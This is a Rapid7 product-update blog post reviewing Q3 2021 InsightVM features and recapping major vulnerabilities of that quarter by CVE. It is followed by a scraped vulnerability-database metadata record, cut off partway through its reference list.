What's New in InsightVM: Q3 2021 in Review

2021-10-08T13:30:00

Description

![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg) In today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization. ## Apple Silicon support on the Insight Agent We're excited to announce that the Insight Agent now natively supports Apple Silicon chips! Apple announced the first generation Apple Silicon chip — the M1 processor — in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years. The new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>). ![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png) ## Asset and Vulnerability Details reports This new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share! ![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png) This is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this. Jane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly. Moreover, while undertaking this effort, another team member — Bill — finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many. ## Snyk integration for reporting vulnerabilities Container Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries. ## Emergent threat coverage recap Q3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed “[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations. Other notable emergent threats included: * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>) * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>) * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>) * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>) * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>) ## Stay tuned! As always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7. #### NEVER MISS A BLOG Get the latest stories, expertise, and news about security today. Subscribe

{"id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "type": "rapid7blog", "bulletinFamily": "info", "title": "What's New in InsightVM: Q3 2021 in Review", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2021-10-08T13:30:00", "modified": "2021-10-08T13:30:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "reporter": "Sophie Johnson", "references": [], "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "immutableFields": [], "lastseen": "2021-10-08T15:44:47", "viewCount": 126, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844"]}, {"type": "attackerkb", "idList": ["AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:68C898AA-7786-44EB-AA49-BDCE98588D8C", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D"]}, {"type": "avleonov", "idList": ["AVLEONOV:14EA12A691C5CFD8469608EAE2674E5B", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "AVLEONOV:C94D71525D4EE3653DAE00D2FB37BBE1"]}, {"type": "cert", "idList": ["VU:131152", "VU:383432", "VU:506989"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0461", "CPAI-2021-0465", "CPAI-2021-0548", "CPAI-2021-0728", "CPAI-2021-0879", "CPAI-2021-0917"]}, {"type": "cisa", "idList": ["CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:2E658D779271DB98A2BD53EE81F29F3B", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:3A09D1755051967FC65BD11A814E9167", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:D9F4EE6727B9BF3A40025E9D70945311"]}, {"type": "cve", "idList": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"]}, {"type": "exploitdb", "idList": ["EDB-ID:50131", "EDB-ID:50243"]}, {"type": "githubexploit", "idList": ["00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "0263BC36-BEB1-519B-965B-52D9E6AB116F", "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "0BB19334-D311-5464-B40B-7B27A0AD8825", "14B62DA4-FBC4-5B89-AB9F-9F8E3505AFAD", "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "15CF4822-F1E8-5BDB-8E65-8FC88F816E1E", "17B904FB-7F3D-54F1-B1B5-069C67184EE5", "1883DF48-6A75-5743-AC93-56292D93A794", "19D705F8-AE98-5DD9-BC4E-CDC0497FB840", "1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "1E42289A-77F8-55A2-B85E-83CAA00CE951", "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "21F83D93-118D-50C7-A5C0-B2069237666E", "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "272E1B9F-32B1-5E4A-A0A9-44AC16DA37DB", "27CF7C36-9804-5585-80B1-749949BF7AD5", "27F005C9-EA16-5734-81D4-8D66FA582FF9", "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "2A12C3BB-2A75-5B33-AE9B-348DB656AC81", "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "2D7B9CB1-3FDE-5B73-A600-18F0A50BAD80", "3399B834-8492-5C0C-AA14-7F120BA37AF6", "37A629E7-9341-5873-B641-E06D7998FA58", "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "3D6A6F0D-C38E-5819-A3A7-817A49825CBE", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "4749D0AA-8CE9-53E3-8EFF-E818FDC61B24", "47577DF3-ABF2-57F3-A35B-0496F4EE7DD9", "4A3F2A96-B727-5EF1-B1C1-FE041BA02E28", "4A8A9FBD-F634-579A-8E0A-49AA84D733A8", "4A995433-D0C6-5BF7-9A78-962229397A7D", "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "4E279194-AC85-5607-A943-AC23EADADEF7", "4FD5C1B6-357A-5C95-AE75-CF79BDD32592", "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "5AE71695-062E-5DBA-9A16-69BD0C7D1384", "5D86E24D-31EE-5EFA-9D3D-FDD9090FFDEE", "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "645DABC8-04DA-51BF-A20F-68F611D2D666", "64AAF745-D50D-575C-B3FF-A09072475502", "6B43F1C6-9617-5317-90DA-3EB5A74767E2", "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "6F87E072-E5AF-533F-8FC7-725ACB3BD31F", "73C3C634-4118-5E8F-A7A7-ADE9356507EC", "7C3B421E-ED99-5C5F-B2BA-4418307C0EBF", "82FD6A90-EA27-5350-98A4-491B6CA140ED", "84D5F04A-0DDB-5788-8759-DA99D303B756", "8542D571-7253-5609-BC52-CBCB5F40929A", "86F04665-0984-596F-945A-3CA176A53057", "895FF449-0383-5007-9352-FABB3E8BD54C", "8EDE916A-F04B-59F0-A88D-13DEF969DC00", "943CFE24-FF5E-5BEA-B1DF-3163AED2C847", "97046A6F-8428-5DCF-88B4-4101351D637C", "98CA9A39-577D-51F2-B8B9-B20E80D94173", "98CEA984-CF02-58F6-91D5-967F8D36F94A", "9A318669-DAF8-50FF-A5DF-E390E0386254", "9B660139-27C8-56B8-B9E2-8124D0E9F502", "9CC224C9-907A-5219-8EFD-A94F15DE0ADD", "A32F9E91-783B-5C20-9630-6A4E3DDA9AFF", "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "A66D9AD7-B29D-5C48-B247-D8ACFCAE9BC7", "A9A21055-01FA-5B3E-84B3-E294A9641418", "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "AAD37CB5-B2C3-5908-B0D3-052CF47F6D25", "AD904001-0962-5826-AD78-253E0FB3B7B7", "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "AF2B8EF5-A739-53BD-8B8D-04A8C441268C", "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "B16D26DB-D60C-5C0C-9452-80112720B442", "B26A6295-2D2D-508F-B94C-38B6944F8A1F", "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "B3985759-BBD2-5956-860D-E6361564C262", "B8D9E2C0-202B-5806-88D2-B0E797582618", "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "BB9DA286-F06B-5A55-B344-1196B32F3C2B", "BDFBDA81-0DEB-5523-B538-F23C3B524986", "BF498AAC-B85E-5E3F-87EC-BC028A10A6D6", "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "BFA4DC64-759A-5113-842C-923C98D12B44", "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "C6AE3BFC-9BBB-5327-8845-C88ABB6FEE40", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "CD8CABD7-BE65-5434-B682-F73ABA737C65", "CE477D7E-7586-5C82-8DCC-033C48461E66", "D089579B-4420-5AD5-999F-45063D972E66", "D21805C7-F04C-57A9-8A40-84CEEB7695BC", "D76E0403-C1B5-59A1-A7E5-B8D3BE2E636D", "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "E1AF9415-BECF-5F8A-9233-786A0F50E149", "E235B3DF-990F-5508-9496-90462B45125D", "E601A788-C87D-5DD7-98BA-A68C2FEDE978", "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F1347375-6380-5145-9881-486B76875649", "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "F1B229EB-2178-53B9-839E-BA0B916376A2", "F1C20A6A-5492-50FE-BB94-25D35B1459EC", "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "F92F972D-7309-5D0B-BCC2-054883AE83E9", "FBC9D472-5E25-508D-AB6E-B3197FCFED2D", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FF81AF93-C247-5242-810E-AA1201C16776", "FFBC2747-5957-57B1-9DD9-AB2BAFCB7BD6"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:3B4F7E79DDCD0AFF3B9BB86429182DCA"]}, {"type": "hackerone", "idList": ["H1:1248040", "H1:1249456"]}, {"type": "hivepro", "idList": ["HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "HIVEPRO:8D09682ECAC92A6EA4B81D42F45F0233", "HIVEPRO:8DA601C83DB9C139357327C06B06CB36", "HIVEPRO:CFFBC7E8786DCD48596ACB491F713B13", "HIVEPRO:E7E537280075DE5C0B002F1AF44BE1C5", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634"]}, {"type": "kaspersky", "idList": ["KLA12198", "KLA12202", "KLA12213", "KLA12214", "KLA12239", "KLA12242"]}, {"type": "kitploit", "idList": ["KITPLOIT:232707789076746523"]}, {"type": "krebs", "idList": ["KREBS:3CC49021549439F95A2EDEB2029CF54E", "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0", "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E", "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "MALWAREBYTES:DB34937B6474073D9444648D34438225", "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-CVE_2021_35464_FORGEROCK_OPENAM-", "MSF:EXPLOIT-WINDOWS-DCERPC-CVE_2021_1675_PRINTNIGHTMARE-", "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:79BA2A7EEC02196D9F15979AFB6BD9D2", "MMPC:B1806E4D7F97F83DB41A41A9BBF86D13", "MMPC:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1675", "MS:CVE-2021-34527", "MS:CVE-2021-36934"]}, {"type": "mskb", "idList": ["KB5004945", "KB5004946", "KB5004947", "KB5004948", "KB5004950", "KB5004951", "KB5004953", "KB5004954", "KB5004955", "KB5004956", "KB5004958", "KB5004959", "KB5004960"]}, {"type": "msrc", "idList": ["MSRC:239E65C8BEB88185329D9990C80B10DF", "MSRC:CB3C49E52425E7C1B0CFB151C6D488A4"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:79BA2A7EEC02196D9F15979AFB6BD9D2", "MSSECURE:B1806E4D7F97F83DB41A41A9BBF86D13", "MSSECURE:C6E199EAD7CE978C9F1B558F17746AFD"]}, {"type": "nessus", "idList": ["CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "FORGEROCK_OPENAM_7_0.NASL", "MANAGEENGINE_ADSELFSERVICE_6114.NASL", "MANAGEENGINE_ADSELFSERVICE_PLUS_CVE-2021-40539.NBIN", "MANAGEENGINE_EVENTLOG_ANALYZER_CVE-2021-40539.NBIN", "MANAGEENGINE_LOG360_CVE-2021-40539.NBIN", "OPENAM_CVE-2021-35464.NBIN", "SERVU_15_2_3_2.NASL", "SMB_NT_MS21_JUL_5004945.NASL", "SMB_NT_MS21_JUL_5004946.NASL", "SMB_NT_MS21_JUL_5004947.NASL", "SMB_NT_MS21_JUL_5004948.NASL", "SMB_NT_MS21_JUL_5004950.NASL", "SMB_NT_MS21_JUL_5004951.NASL", "SMB_NT_MS21_JUL_5004958.NASL", "SMB_NT_MS21_JUL_5004959.NASL", "SMB_NT_MS21_JUL_5004960.NASL", "SMB_NT_MS21_JUL_CVE-2021-34527_REG_CHECK.NASL", "SMB_NT_MS21_JUN_5003635.NASL", "SMB_NT_MS21_JUN_5003637.NASL", "SMB_NT_MS21_JUN_5003638.NASL", "SMB_NT_MS21_JUN_5003646.NASL", "SMB_NT_MS21_JUN_5003681.NASL", "SMB_NT_MS21_JUN_5003687.NASL", "SMB_NT_MS21_JUN_5003694.NASL", "SMB_NT_MS21_JUN_5003695.NASL", "SMB_NT_MS21_JUN_5003697.NASL", "SMB_NT_SERIOUS_SAM_CHECK.NBIN", "VMWARE_VCENTER_67_U3O_VMSA-2021-0020.NASL", "VMWARE_VCENTER_70_U2C_VMSA-2021-0020.NASL", "VMWARE_VCENTER_CVE-2021-22005.NBIN", "WEB_APPLICATION_SCANNING_112812", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163486", "PACKETSTORM:163525", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:164439", "PACKETSTORM:165085", "PACKETSTORM:167261", "PACKETSTORM:167449"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:12BC089A56EB28CFD168EC09B070733D", "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "QUALYSBLOG:485C0D608A0A8288FF38D618D185D2A2", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:21FF66FD08C23AC39BCCB8CFE2238507", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:45A121567763FF457DE6E50439C2605A", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5223F0ED8D616DB4EE860CF6B7770388", "RAPID7BLOG:57AB78EC625B6F8060F1E6BD668BDD0C", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "RAPID7BLOG:8DADA7B6B3B1BA6ED3D6EDBA37A79204", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "RAPID7BLOG:BC95AC0129EFB4BE8FD9B532251948ED", "RAPID7BLOG:C1B4AB12CDDD030CDAB31AA2F9E27438", "RAPID7BLOG:D84509B01151F59E9152A401D5CF206D", 